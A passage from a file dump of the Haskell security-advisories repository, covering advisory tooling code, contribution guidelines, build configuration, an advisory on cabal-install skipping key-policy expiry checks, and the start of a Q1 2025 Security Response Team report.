39 | <> show (snapshotRoot snapshot) 40 | <> " from " 41 | <> show (getSnapshotUrl $ snapshotUrl snapshot) 42 | putStrLn $ 43 | case s of 44 | Created -> "Snapshot just created" 45 | Updated -> "Snapshot updated" 46 | AlreadyUpToDate -> "Snapshot already up-to-date" 47 | 48 | commandStatus :: Parser (IO ()) 49 | commandStatus = go <$> repositoryParser 50 | where 51 | go snapshot = do 52 | result <- status snapshot 53 | hPutStrLn stderr $ 54 | case result of 55 | DirectoryMissing -> "Directory is missing" 56 | DirectoryIncoherent -> "Directory is incoherent" 57 | DirectoryUpToDate -> "Repository is up-to-date" 58 | DirectoryOutDated -> "Repository is out-dated" 59 | 60 | repositoryParser :: Parser Snapshot 61 | repositoryParser = 62 | mkSnapshotSnapshot 63 | <$> strOption 64 | ( long "snapshot-root" 65 | <> short 'd' 66 | <> metavar "SNAPSHOT-ROOT" 67 | <> value (snapshotRoot defaultSnapshot) 68 | ) 69 | <*> (fmap Left repositoryGithubParser <|> fmap Right repositoryUrlParser) 70 | where mkSnapshotSnapshot root params = 71 | case params of 72 | Left (repoUrl, repoBranch) -> 73 | githubSnapshot root repoUrl repoBranch 74 | Right snapshotUrl' -> 75 | Snapshot 76 | { snapshotRoot = root, 77 | snapshotUrl = SnapshotUrl snapshotUrl' 78 | } 79 | 80 | 81 | repositoryGithubParser :: Parser (String, String) 82 | repositoryGithubParser = 83 | (,) 84 | <$> strOption 85 | ( long "repository-url" 86 | <> short 'r' 87 | <> metavar "REPOSITORY-URL" 88 | <> value "https://github.com/haskell/security-advisories" 89 | ) 90 | <*> strOption 91 | ( long "repository-branch" 92 | <> short 'b' 93 | <> metavar "REPOSITORY-BRANCH" 94 | <> value "generated/snapshot-export" 95 | ) 96 | 97 | repositoryUrlParser :: Parser String 98 | repositoryUrlParser = 99 | strOption 100 | ( long "archive-url" 101 | <> short 'u' 102 | <> metavar "ARCHIVE-URL" 103 | ) 104 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Reporting Vulnerabilities 2 | 3 | To add an advisory to the database, open a [Pull Request] against 4 | [this](https://github.com/haskell/security-advisories/pulls) repository containing the new advisory: 5 | 6 | ## Required Steps 7 | 8 | 1. Create a file named `HSEC-0000-0000.md` in the `advisories/hackage/` 9 | subdirectory of the repository (you may need to create it if it doesn't exist) 10 | 2. Copy and paste the [TOML advisory template] from the README.md file in this repo. 11 | Delete the comments and additional whitespace, and fill it out with the 12 | details of the advisory. Surround the TOML data with \```toml and \``` markers. 13 | 3. Write a human-readable Markdown description in the same file, after the \``` marker and a newline. Use [this example advisory][example] as a reference. 14 | 4. Open a [Pull Request]. After being reviewed your advisory will be assigned 15 | a `HSEC-*` advisory identifier and be published to the database. 16 | 17 | ### Optional Steps 18 | 19 | Feel free to do either or both of these as you see fit (we recommend you do both): 20 | 21 | 4. Deprecate the affected versions of the package on Hackage. 22 | 5. Request a CVE for your vulnerability. See for details: 23 | and . 24 | Alternatively, you can create a GitHub Security Advisory (GHSA) and let them request 25 | a CVE for you. In this case, you can add the GHSA ID to the advisory via the 26 | `aliases` field. 27 | 28 | ### License 29 | 30 | All published security advisories are released under [CC0](https://creativecommons.org/share-your-work/public-domain/cc0/). By contributing an advisory, you agree to release the entire content of the advisory (including machine-readable metadata, example code, and textual descriptions) under CC0. 31 | 32 | ## Criteria 33 | 34 | This is a database of security vulnerabilities. The following are 35 | examples of qualifying vulnerabilities: 36 | 37 | * Code Execution (i.e. RCE) 38 | * Denial of service opportunities 39 | * Memory Corruption 40 | * Privilege Escalation (either at OS level or inside of an app/library) 41 | * File Disclosure / Directory Traversal 42 | * Web Security (e.g. XSS, CSRF) 43 | * Format Injection, e.g. shell escaping, SQL injection (and also XSS) 44 | * Cryptography Failure (e.g. confidentiality breakage, integrity breakage, key leakage) 45 | * Covert Channels (e.g. Spectre, Meltdown) 46 | 47 | ## FAQ 48 | 49 | **Q: Do I need to be the maintainer of a package to file an advisory?** 50 | 51 | A: No, anyone can file an advisory against any package. Reports 52 | will be verified prior to merging. If a report 53 | turns out to be incorrect then it will be corrected or removed from the 54 | database. 55 | 56 | **Q: Can I file an advisory without creating a pull request?** 57 | 58 | A: Yes, instead of creating a full advisory yourself you can also 59 | [open an issue on the security-advisories repo](https://github.com/haskell/security-advisories/issues) 60 | or email information about the vulnerability to 61 | 62 | **Q: Does this project have a PGP key or other means of handling embargoed vulnerabilities?** 63 | 64 | A: High-impact vulnerabilities can be reported privately to 65 | [security-advisories@haskell.org](mailto:security-advisories@haskell.org), 66 | but we do not use PGP. Alternatively, Haskell vulnerabilities can 67 | be reported via the CERT/CC [VINCE] system. Use "Haskell 68 | Programming Language" as the vendor name. 69 | 70 | [VINCE]: https://kb.cert.org/vince/ 71 | [Pull Request]: https://github.com/haskell/security-advisories/pulls 72 | [TOML advisory template]: https://github.com/haskell/security-advisories/blob/main/README.md#advisory-format 73 | [example]: https://raw.githubusercontent.com/haskell/security-advisories/main/EXAMPLE_ADVISORY.md 74 | -------------------------------------------------------------------------------- /code/hsec-tools/assets/css/default.css: -------------------------------------------------------------------------------- 1 | :root{ 2 | --bg-color:#FFFFFF; 3 | --text-color:#333; 4 | --outline-color:#DB83ED; 5 | --header-color:#5E5184; 6 | --anchor-color:#9E358F; 7 | --anchor-visited-color:#6F5F9C; 8 | --code-bg-color:#FAFAFA; 9 | --filename-bg:#EAEAEA; 10 | --code-color:#383a42; 11 | --code-bg-color:#fafafa; 12 | --code-comment-color:#a0a1a7; 13 | --code-kw-color:#af005f; 14 | --code-name-color:#e45649; 15 | --code-literal-color:#268bd2; 16 | --code-string-color:#cb4b16; 17 | --code-attr-color:#986801; 18 | --code-constructor-color:#5f5faf; 19 | --code-symbol-color:#4078f2; 20 | --code-record-field-color:#c18401; 21 | --code-pragma-color:#2aa198 22 | } 23 | @media (prefers-color-scheme:dark){ 24 | :root{ 25 | --bg-color:#333; 26 | --text-color:#C9D1D9; 27 | --header-color:#BBA1FF; 28 | --anchor-color:#EB82DC; 29 | --anchor-visited-color:#D5C5FF; 30 | --code-bg-color:transparent; 31 | --filename-bg:#2C2C2C; 32 | --code-color:#C9D1D9; 33 | --code-bg-color:#333; 34 | --code-comment-color:#a0a1a7; 35 | --code-kw-color:#BBA1FF; 36 | --code-name-color:#e45649; 37 | --code-literal-color:#268bd2; 38 | --code-string-color:#cb4b16; 39 | --code-attr-color:#986801; 40 | --code-constructor-color:#d079c9; 41 | --code-symbol-color:var(--code-color); 42 | --code-record-field-color:#c18401; 43 | --code-pragma-color:#2aa198 44 | } 45 | } 46 | *:focus-visible{ 47 | outline-color:var(--outline-color) 48 | } 49 | body{ 50 | color:var(--text-color); 51 | background-color:var(--bg-color) 52 | } 53 | a{ 54 | color:var(--anchor-color) 55 | } 56 | a:visited{ 57 | color:var(--anchor-visited-color) 58 | } 59 | h1,h2,h3,h4,h5,h6{ 60 | color:var(--header-color) 61 | } 62 | input{ 63 | background-color:rgba(255,255,255,0.06); 64 | color:var(--text-color) 65 | } 66 | .nav-bar{ 67 | text-align: right; 68 | } 69 | .nav-bar ul{ 70 | display: inline-block; 71 | list-style: none; 72 | margin: 0; 73 | padding: 0; 74 | } 75 | .nav-bar li{ 76 | display: inline-block; 77 | vertical-align: middle; 78 | padding: 0; 79 | margin: 0; 80 | height: 100%; 81 | position: relative; 82 | } 83 | *:focus-visible{ 84 | outline-offset:4px; 85 | outline-width:1px 86 | } 87 | body{ 88 | font-size:1.6rem; 89 | margin:0 auto; 90 | max-width:120rem 91 | } 92 | footer{ 93 | margin-top:3rem; 94 | padding:1.2rem 0; 95 | border-top:0.2rem solid #000; 96 | font-size:1.2rem; 97 | color:#555 98 | } 99 | h1{ 100 | font-size:2.4rem 101 | } 102 | h2{ 103 | font-size:2rem 104 | } 105 | html{ 106 | font-size:62.5%; 107 | font-family:Helvetica,sans-serif 108 | } 109 | table tbody td{ 110 | padding:5px 111 | } 112 | footer{ 113 | padding: 0 2%; 114 | text-align: center; 115 | } 116 | footer .HF{ 117 | height:50px; 118 | line-height:50px; 119 | display:inline-block; 120 | background-repeat:no-repeat; 121 | background-image:url('../images/hf-logo.png'); 122 | background-size:50px; 123 | background-position:left center; 124 | padding-left:60px 125 | } 126 | @media (max-width:319px){ 127 | .nav-bar{ 128 | margin:0 1.5rem 0 0; 129 | } 130 | .nav-bar a{ 131 | display:block; 132 | line-height:1.6 133 | } 134 | } 135 | @media (min-width:320px){ 136 | .nav-bar{ 137 | margin:0 2rem 0 0; 138 | } 139 | .nav-bar a{ 140 | display:inline; 141 | margin:0 0.6rem 142 | } 143 | } 144 | @media (min-width:640px){ 145 | .nav-bar{ 146 | margin:0 3rem 0 0; 147 | } 148 | .nav-bar a{ 149 | margin:0 0 0 1.2rem; 150 | display:inline 151 | } 152 | } 153 | 154 | #advisory dt { 155 | margin-top: 0.75em; 156 | } 157 | -------------------------------------------------------------------------------- /flake.nix: -------------------------------------------------------------------------------- 1 | { 2 | description = "hsec-tools"; 3 | 4 | inputs = { 5 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; 6 | flake-utils.url = "github:numtide/flake-utils"; 7 | }; 8 | 9 | outputs = { self, nixpkgs, flake-utils }: 10 | flake-utils.lib.eachDefaultSystem (system: 11 | let 12 | overlays = [ ]; 13 | pkgs = 14 | import nixpkgs { inherit system overlays; config.allowBroken = true; }; 15 | jailbreakUnbreak = pkg: 16 | pkgs.haskell.lib.doJailbreak (pkgs.haskell.lib.dontCheck (pkgs.haskell.lib.unmarkBroken pkg)); 17 | 18 | purl = pkgs.haskellPackages.callCabal2nix "purl" ./code/purl { }; 19 | cvss = pkgs.haskellPackages.callCabal2nix "cvss" ./code/cvss { }; 20 | osv = pkgs.haskellPackages.callCabal2nix "osv" ./code/osv { inherit cvss purl; }; 21 | hsec-core = pkgs.haskellPackages.callCabal2nix "hsec-core" ./code/hsec-core { 22 | inherit cvss osv; 23 | }; 24 | hsec-tools = returnShellEnv: 25 | pkgs.haskellPackages.developPackage { 26 | inherit returnShellEnv; 27 | name = "hsec-tools"; 28 | root = ./code/hsec-tools; 29 | withHoogle = false; 30 | overrides = self: super: { 31 | inherit cvss hsec-core osv; 32 | }; 33 | 34 | modifier = drv: 35 | if returnShellEnv 36 | then 37 | pkgs.haskell.lib.addBuildTools drv 38 | (with pkgs.haskellPackages; 39 | [ 40 | cabal-fmt 41 | cabal-install 42 | ghcid 43 | haskell-language-server 44 | pkgs.nixpkgs-fmt 45 | ]) 46 | else drv; 47 | }; 48 | hsec-sync = 49 | pkgs.haskell.lib.dontCheck 50 | (pkgs.haskellPackages.callCabal2nix 51 | "hsec-sync" 52 | ./code/hsec-sync 53 | { inherit hsec-core; }); 54 | 55 | gitconfig = 56 | pkgs.writeTextFile { 57 | name = ".gitconfig"; 58 | text = '' 59 | [safe] 60 | directory = * 61 | ''; 62 | destination = "/.gitconfig"; # should match 'config.WorkDir' 63 | }; 64 | in 65 | { 66 | packages.cvss = cvss; 67 | packages.osv = osv; 68 | packages.purl = purl; 69 | packages.hsec-core = hsec-core; 70 | packages.hsec-tools = pkgs.haskell.lib.justStaticExecutables (hsec-tools false); 71 | packages.hsec-sync = hsec-sync; 72 | packages.hsec-tools-image = 73 | pkgs.dockerTools.buildImage { 74 | name = "haskell/hsec-tools"; 75 | tag = "latest"; 76 | 77 | copyToRoot = pkgs.buildEnv { 78 | name = "image-root"; 79 | paths = [ 80 | self.packages.${system}.hsec-tools 81 | pkgs.gitMinimal.out 82 | gitconfig 83 | ]; 84 | pathsToLink = [ "/bin" "/" ]; 85 | }; 86 | runAsRoot = "rm -Rf /share"; 87 | config = { 88 | Cmd = [ "/bin/hsec-tools" ]; 89 | Env = [ 90 | "LOCALE_ARCHIVE=${pkgs.glibcLocalesUtf8}/lib/locale/locale-archive" 91 | "LC_TIME=en_US.UTF-8" 92 | "LANG=en_US.UTF-8" 93 | "LANGUAGE=en" 94 | "LC_ALL=en_US.UTF-8" 95 | "GIT_DISCOVERY_ACROSS_FILESYSTEM=1" 96 | ]; 97 | Volumes = { 98 | "/repo" = { }; 99 | }; 100 | WorkDir = "/"; 101 | }; 102 | }; 103 | # Used by `nix build` & `nix run` (prod exe) 104 | defaultPackage = self.packages.${system}.hsec-tools; 105 | 106 | # Used by `nix develop` (dev shell) 107 | devShell = hsec-tools true; 108 | }); 109 | } 110 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Generate/Snapshot.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE DeriveAnyClass #-} 2 | {-# LANGUAGE DeriveGeneric #-} 3 | {-# LANGUAGE DerivingStrategies #-} 4 | {-# LANGUAGE LambdaCase #-} 5 | {-# LANGUAGE OverloadedStrings #-} 6 | 7 | module Security.Advisories.Generate.Snapshot 8 | ( createSnapshot, 9 | ) 10 | where 11 | 12 | import Control.Monad (forM_) 13 | import Data.Aeson (ToJSON, encodeFile) 14 | import Data.Default (def) 15 | import qualified Data.Text.IO as T 16 | import Data.Time (UTCTime) 17 | import Data.Version (Version) 18 | import GHC.Generics (Generic) 19 | import Paths_hsec_tools (version) 20 | import qualified Prettyprinter as Pretty 21 | import qualified Prettyprinter.Render.Text as Pretty 22 | import Security.Advisories.Core.Advisory 23 | import Security.Advisories.Filesystem (advisoryFromFile, forAdvisory, forReserved) 24 | import Security.Advisories.Format (fromAdvisory) 25 | import System.Directory (copyFileWithMetadata, createDirectoryIfMissing) 26 | import System.FilePath (takeDirectory, (), takeFileName) 27 | import System.IO (hPrint, hPutStrLn, stderr) 28 | import Text.Pandoc (Block (CodeBlock), Pandoc (Pandoc), nullMeta, runIOorExplode) 29 | import Text.Pandoc.Writers (writeCommonMark) 30 | import qualified Toml 31 | import Validation (Validation (..)) 32 | import qualified Data.Text as T 33 | 34 | -- * Actions 35 | 36 | createSnapshot :: FilePath -> FilePath -> IO () 37 | createSnapshot src dst = do 38 | let toDstFilePath orig = dst drop (length src + 1) orig 39 | 40 | forReserved src $ \p _ -> do 41 | createDirectoryIfMissing True $ takeDirectory $ toDstFilePath p 42 | hPutStrLn stderr $ "Copying '" <> p <> "' to '" <> toDstFilePath p <> "'" 43 | copyFileWithMetadata p $ toDstFilePath p 44 | 45 | advisoriesLatestUpdates <- 46 | forAdvisory src $ \p _ -> do 47 | hPutStrLn stderr $ "Taking a snapshot of '" <> p <> "'" 48 | advisoryFromFile p 49 | >>= \case 50 | Failure e -> do 51 | hPrint stderr e 52 | return [] 53 | Success advisory -> do 54 | let pandoc = 55 | Pandoc 56 | nullMeta 57 | ( CodeBlock 58 | ("", ["toml"], []) 59 | ( Pretty.renderStrict $ 60 | Pretty.layoutPretty Pretty.defaultLayoutOptions $ 61 | Toml.encode $ 62 | fromAdvisory advisory 63 | ) 64 | : blocks (advisoryPandoc advisory) 65 | ) 66 | blocks (Pandoc _ xs) = xs 67 | rendered <- runIOorExplode $ writeCommonMark def pandoc 68 | 69 | let targetFiles = 70 | concat 71 | [ [toDstFilePath p], 72 | legacyComponentFile . affectedComponentIdentifier <$> advisoryAffected advisory 73 | ] 74 | advisoryFilename = takeFileName p 75 | legacyComponentFile = 76 | \case 77 | Repository _ repoName pkg -> dst T.unpack (unRepositoryName repoName) unPackageName pkg advisoryFilename 78 | GHC comp -> dst "ghc" T.unpack (ghcComponentToText comp) advisoryFilename 79 | forM_ targetFiles $ \targetFile -> do 80 | hPutStrLn stderr $ " * Writing it to '" <> targetFile <> "'" 81 | createDirectoryIfMissing True $ takeDirectory targetFile 82 | T.writeFile targetFile rendered 83 | 84 | return [advisoryModified advisory] 85 | 86 | let metadataPath = dst "snapshot.json" 87 | metadata = 88 | SnapshotMetadata 89 | { latestUpdate = maximum advisoriesLatestUpdates, 90 | snapshotVersion = version 91 | } 92 | hPutStrLn stderr $ "Writing snapshot metadata to '" <> metadataPath <> "'" 93 | encodeFile metadataPath metadata 94 | 95 | data SnapshotMetadata = SnapshotMetadata 96 | { latestUpdate :: UTCTime, 97 | snapshotVersion :: Version 98 | } 99 | deriving stock (Generic) 100 | deriving anyclass (ToJSON) 101 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Git.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | {-# LANGUAGE DerivingStrategies #-} 3 | 4 | {-| 5 | 6 | Helpers for deriving advisory metadata from a Git repo. 7 | 8 | -} 9 | module Security.Advisories.Git 10 | ( AdvisoryGitInfo(..) 11 | , GitError(..) 12 | , explainGitError 13 | , getAdvisoryGitInfo 14 | , getRepoRoot 15 | , add 16 | , commit 17 | ) 18 | where 19 | 20 | import Data.Char (isSpace) 21 | import Data.List (dropWhileEnd) 22 | import qualified Data.List.NonEmpty as NE 23 | import Data.Time (UTCTime, zonedTimeToUTC) 24 | import Data.Time.Format.ISO8601 (iso8601ParseM) 25 | import System.Exit (ExitCode(ExitSuccess)) 26 | import System.FilePath (splitFileName) 27 | import System.Process (readProcessWithExitCode) 28 | import Control.Applicative ((<|>)) 29 | 30 | data AdvisoryGitInfo = AdvisoryGitInfo 31 | { firstAppearanceCommitDate :: UTCTime 32 | , lastModificationCommitDate :: UTCTime 33 | } 34 | 35 | data GitError 36 | = GitProcessError ExitCode String String -- ^ exit code, stdout and stderr 37 | | GitTimeParseError String -- ^ unable to parse this input as a datetime 38 | deriving stock (Eq, Ord, Show) 39 | 40 | explainGitError :: GitError -> String 41 | explainGitError = \case 42 | GitProcessError status stdout stderr -> 43 | unlines 44 | [ "git exited with status " <> show status 45 | , ">>> standard output:" 46 | , stdout 47 | , ">>> standard error:" 48 | , stderr 49 | ] 50 | GitTimeParseError s -> 51 | "failed to parse time: " <> s 52 | 53 | -- | Get top-level directory of the working tree. 54 | -- 55 | getRepoRoot :: FilePath -> IO (Either GitError FilePath) 56 | getRepoRoot path = do 57 | (status, stdout, stderr) <- readProcessWithExitCode 58 | "git" 59 | [ "-C", path 60 | , "rev-parse" 61 | , "--show-toplevel" 62 | ] 63 | "" -- standard input 64 | pure $ case status of 65 | ExitSuccess -> Right $ trim stdout 66 | _ -> Left $ GitProcessError status stdout stderr 67 | where 68 | trim = dropWhileEnd isSpace . dropWhile isSpace 69 | 70 | -- | Add changes to index 71 | -- 72 | add 73 | :: FilePath -- ^ path to working tree 74 | -> [FilePath] -- ^ files to update in index 75 | -> IO (Either GitError ()) 76 | add path pathspecs = do 77 | (status, stdout, stderr) <- readProcessWithExitCode 78 | "git" 79 | ( ["-C", path, "add"] <> pathspecs ) 80 | "" -- standard input 81 | pure $ case status of 82 | ExitSuccess -> Right () 83 | _ -> Left $ GitProcessError status stdout stderr 84 | 85 | -- | Commit changes to repo. 86 | -- 87 | commit 88 | :: FilePath -- ^ path to working tree 89 | -> String -- ^ commit message 90 | -> IO (Either GitError ()) 91 | commit path msg = do 92 | (status, stdout, stderr) <- readProcessWithExitCode 93 | "git" 94 | ["-C", path, "commit", "-m", msg] 95 | "" -- standard input 96 | pure $ case status of 97 | ExitSuccess -> Right () 98 | _ -> Left $ GitProcessError status stdout stderr 99 | 100 | getAdvisoryGitInfo :: FilePath -> IO (Either GitError AdvisoryGitInfo) 101 | getAdvisoryGitInfo path = do 102 | let (dir, file) = splitFileName path 103 | (status, stdout, stderr) <- readProcessWithExitCode 104 | "git" 105 | [ "-C", dir 106 | , "log" 107 | , "--pretty=format:%cI" -- print committer date 108 | , "--find-renames" 109 | , file 110 | ] 111 | "" -- standard input 112 | let timestamps = filter (not . null) $ lines stdout 113 | case status of 114 | ExitSuccess | Just timestamps' <- NE.nonEmpty timestamps -> 115 | pure $ AdvisoryGitInfo 116 | <$> parseTime (NE.last timestamps') -- first commit is last line 117 | <*> parseTime (NE.head timestamps') -- most recent commit is first line 118 | _ -> 119 | -- `null lines` should not happen, but if it does we treat it 120 | -- the same as `ExitFailure` 121 | pure . Left $ GitProcessError status stdout stderr 122 | where 123 | parseTime :: String -> Either GitError UTCTime 124 | parseTime s = maybe (Left $ GitTimeParseError s) Right $ 125 | iso8601ParseM s 126 | <|> zonedTimeToUTC <$> iso8601ParseM s 127 | -------------------------------------------------------------------------------- /code/hsec-sync/test/Spec/SyncSpec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Spec.SyncSpec (spec) where 4 | 5 | import Control.Monad (unless) 6 | import Data.Bifunctor (first) 7 | import Security.Advisories.Sync 8 | import qualified System.Directory as D 9 | import System.Environment (lookupEnv) 10 | import System.FilePath (()) 11 | import System.IO.Temp (withSystemTempDirectory) 12 | import Test.Tasty 13 | import Test.Tasty.HUnit 14 | 15 | spec :: TestTree 16 | spec = testGroup "Sync" [] 17 | 18 | _spec :: TestTree 19 | _spec = 20 | testGroup 21 | "Sync" 22 | [ testGroup 23 | "sync" 24 | [ testCase "Invalid root should fail" $ do 25 | let snapshot = snapshotAt "/dev/advisories" 26 | status snapshot >>= (@?= DirectoryMissing) 27 | isGitHubActionRunner <- lookupEnv "GITHUB_ACTIONS" 28 | unless (isGitHubActionRunner == Just "true") $ do 29 | -- GitHub Action runners let you write anywhere 30 | result <- sync snapshot 31 | first (const ("" :: String)) result @?= Left "" 32 | status snapshot >>= (@?= DirectoryMissing), 33 | testCase "Subdirectory creation should work" $ 34 | withSystemTempDirectory "hsec-sync" $ \p -> do 35 | let snapshot = snapshotAt $ p "snapshot" 36 | status snapshot >>= (@?= DirectoryMissing) 37 | result <- sync snapshot 38 | result @?= Right Created 39 | status snapshot >>= (@?= DirectoryUpToDate), 40 | testCase "With existing subdirectory creation should work" $ 41 | withSystemTempDirectory "hsec-sync" $ \p -> do 42 | D.createDirectory $ p "snapshot" 43 | let snapshot = snapshotAt $ p "snapshot" 44 | result <- sync snapshot 45 | result @?= Right Created, 46 | testCase "Sync twice should be a no-op" $ 47 | withSystemTempDirectory "hsec-sync" $ \p -> do 48 | let snapshot = snapshotAt p 49 | status snapshot >>= (@?= DirectoryIncoherent) 50 | resultCreate <- sync snapshot 51 | resultCreate @?= Right Created 52 | resultResync <- sync snapshot 53 | resultResync @?= Right AlreadyUpToDate, 54 | testCase "Sync behind should update" $ 55 | withSystemTempDirectory "hsec-sync" $ \p -> do 56 | let snapshot = snapshotAt p 57 | resultCreate <- sync snapshot 58 | resultCreate @?= Right Created 59 | writeFile 60 | (p "snapshot.json") 61 | "{\"latestUpdate\":\"2020-03-11T12:26:51Z\",\"snapshotVersion\":\"0.1.0.0\"}" 62 | status snapshot >>= (@?= DirectoryOutDated) 63 | resultResync <- sync snapshot 64 | resultResync @?= Right Updated 65 | status snapshot >>= (@?= DirectoryUpToDate), 66 | testCase "Sync a broken snapshot.json" $ 67 | withSystemTempDirectory "hsec-sync" $ \p -> do 68 | let snapshot = snapshotAt p 69 | resultCreate <- sync snapshot 70 | resultCreate @?= Right Created 71 | writeFile 72 | (p "snapshot.json") 73 | "{\"latestpdate\":\"2020-03-11T12:26:51Z\",\"snapshotVersion\":\"0.1.0.0\"}" 74 | status snapshot >>= (@?= DirectoryIncoherent) 75 | resultResync <- sync snapshot 76 | resultResync @?= Right Updated 77 | status snapshot >>= (@?= DirectoryUpToDate), 78 | testCase "Sync a deleted snapshot.json" $ 79 | withSystemTempDirectory "hsec-sync" $ \p -> do 80 | let snapshot = snapshotAt p 81 | resultCreate <- sync snapshot 82 | resultCreate @?= Right Created 83 | D.removeFile (p "snapshot.json") 84 | status snapshot >>= (@?= DirectoryOutDated) 85 | resultResync <- sync snapshot 86 | resultResync @?= Right Updated 87 | status snapshot >>= (@?= DirectoryIncoherent) 88 | ] 89 | ] 90 | 91 | snapshotAt :: FilePath -> Snapshot 92 | snapshotAt root = 93 | defaultSnapshot {snapshotRoot = root} 94 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0015.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0015" 4 | cwe = [672] 5 | keywords = ["hackage", "mitm", "supply-chain"] 6 | 7 | [[affected]] 8 | package = "cabal-install" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" 10 | [[affected.versions]] 11 | introduced = "1.24.0.0" 12 | fixed = "3.10.2.0" 13 | 14 | [[references]] 15 | type = "REPORT" 16 | url = "https://github.com/haskell/cabal/issues/8918#issuecomment-1521096581" 17 | [[references]] 18 | type = "FIX" 19 | url = "https://github.com/haskell/cabal/commit/dcfdc9cffd74cade4e8cf3df37c5993413ffd30f" 20 | ``` 21 | 22 | # cabal-install uses expired key policies 23 | 24 | A problem was recently discovered in `cabal-install`'s 25 | implementation of the Hackage Security protocol that would allow an 26 | attacker who was in possession of a revoked private key and who 27 | could perform a man-in-the-middle attack against Hackage to use the 28 | revoked key to deliver malicious packages. At this time, this is 29 | only a theoretical attack - no keys have been revoked. Release 30 | 3.10.2.0 of `cabal-install` contains a fix for this bug, and we have 31 | contacted distributors of older versions (such as Linux 32 | distributions) with a patch that they can apply. 33 | 34 | ## Background 35 | 36 | Hackage Security is an implementation of [The Update Framework][], 37 | which is a design for a package repository that allows untrusted 38 | mirrors without undermining software supply-chain security. In 39 | particular, Hackage Security cryptographically guarantees the 40 | following properties: 41 | 42 | * Mirrors of Hackage cannot change the contents of packages. This 43 | prevents the insertion of malicious code. 44 | 45 | * Mirrors cannot omit newer packages for more than a few days 46 | without clients noticing. This ensures both that mirrors cannot 47 | maliciously deny security updates, and that mistakes in their 48 | configuration will be noticed. 49 | 50 | Hackage has a [key policy file][] that delegates authority to a 51 | number of private keys for various purposes. Most of the keys are 52 | kept securely offline by trusted community members who annually 53 | re-sign the various files to indicate that they still have 54 | confidence in Hackage's policies. However, to prevent clients from 55 | being denied updates, Hackage has an automated process that 56 | periodically re-signs a timestamp file. This signature has a short 57 | expiry. Additionally, a snapshot file contains signed hashes of the 58 | Hackage index that is updated on each package upload. The timestamp 59 | and snapshot private keys are held in memory on the Hackage server. 60 | These are called the operational keys. If an operational key is ever 61 | compromised, then it will be revoked by having the Hackage root 62 | keyholders sign a new key policy file. To prevent replay attacks, 63 | clients that connect to Hackage after this update will reject older 64 | policy files, based on a monotonically increasing file version 65 | number. 66 | 67 | If a client has not yet received the updated policy file (for 68 | example, because they have a fresh install of `cabal-install` or 69 | because they have not run `cabal update` in some time), the built-in 70 | expiration date in the file limits the window of exposure in which 71 | the revoked operational keys would be expected. As long as the root 72 | keys have not been compromised, the compromised operational keys can 73 | only be used until the policy file expires. In addition to 74 | compromising a Hackage operational key, an attacker would 75 | additionally need to either compromise a Hackage mirror or perform a 76 | man-in-the-middle attack against the target in order to serve a 77 | malicious or obsolete package index. 78 | 79 | [key policy file]: https://hackage.haskell.org/root.json 80 | [The Update Framework]: https://theupdateframework.io/ 81 | 82 | ## The Issue 83 | 84 | A bug in `cabal-install` caused it to skip the verification of the 85 | key policy file's expiration timestamp. This means that users of 86 | older, unpatched versions of `cabal-install` could be vulnerable to 87 | a malicious mirror or man-in-the-middle attack against Hackage if 88 | they have not connected to Hackage in a long time, even after the 89 | policy file has expired. 90 | 91 | We do not believe that it has been possible to exploit this 92 | vulnerability, because no operational keys have been revoked. 93 | However, in case key revocation occurs, we strongly advise all users 94 | of `cabal-install` to ensure that they have version 3.10.2.0 or 95 | newer, which contain the fix. 96 | -------------------------------------------------------------------------------- /reports/2025-04-04-Q1-report.md: -------------------------------------------------------------------------------- 1 | # Haskell Security Response Team - 2025 January–March report 2 | 3 | The Haskell Security Response Team (SRT) is a volunteer organization 4 | within the Haskell Foundation that is building tools and processes 5 | to aid the entire Haskell ecosystem in assessing and responding to 6 | security risks. In particular, we maintain a [database][repo] of 7 | security advisories that can serve as a data source for security 8 | tooling. 9 | 10 | This report details the SRT activities for January–March 2025. 11 | 12 | [repo]: https://github.com/haskell/security-advisories 13 | 14 | The SRT is: 15 | 16 | - Fraser Tweedale 17 | - Gautier Di Folco 18 | - Lei Zhu 19 | - Mihai Maruseac 20 | - Montez Fitzpatrick 21 | - Tristan de Cacqueray 22 | 23 | 24 | ## How to contact the SRT 25 | 26 | For assistance in coordinating a security response to newly 27 | discovered, high impact vulnerabilities, contact 28 | `security-advisories@haskell.org`. Due to limited resources, we can 29 | only coordinate embargoed disclosures for high impact 30 | vulnerabilities affecting current versions of core Haskell tools and 31 | libraries, or in other exceptional cases. 32 | 33 | You can submit lower-impact or historical vulnerabilities to the 34 | advisory database via a pull request to our [GitHub 35 | repository][repo]. 36 | 37 | You can also contact the SRT about non-advisory/security-response 38 | topics. We prefer public communication where possible. In most 39 | cases, [GitHub issues][gh-new-issue] are an appropriate forum. But 40 | the mail address is there if no other appropriate channel exists. 41 | 42 | [gh-new-issue]: https://github.com/haskell/security-advisories/issues/new/choose 43 | 44 | 45 | ## Haskell Security Response Team at ZuriHac + Ecosystem Workshop 46 | 47 | Gautier will represent the SRT at [ZuriHac] and the [Haskell 48 | Ecosystem Workshop][] (June 5–9). This is a great opportunity to 49 | collaborate on Haskell security tooling, either in person in Zürich 50 | or virtually. 51 | 52 | If you have a particular project or collaboration idea, please share 53 | it in the [planning issue (#272)][ticket]. 54 | 55 | [ZuriHac]: https://zfoh.ch/zurihac2025/ 56 | [Haskell Ecosystem Workshop]: https://haskell.foundation/events/2025-haskell-ecosystem-workshop.html 57 | [ticket]: https://github.com/haskell/security-advisories/issues/272 58 | 59 | 60 | ## Conference presentation: *Security response for open source ecosystems* 61 | 62 | Fraser presented at [CrikeyCon], a cybersecurity conference in 63 | Brisbane, Australia. The talk *Security response for open source 64 | ecosystems* explains why open source security matters and how to 65 | start and run a security response team, based on his experiences 66 | with the Haskell SRT. 67 | 68 | The [slide deck] is available now. Video of the presentation should 69 | appear on the CrikeyCon 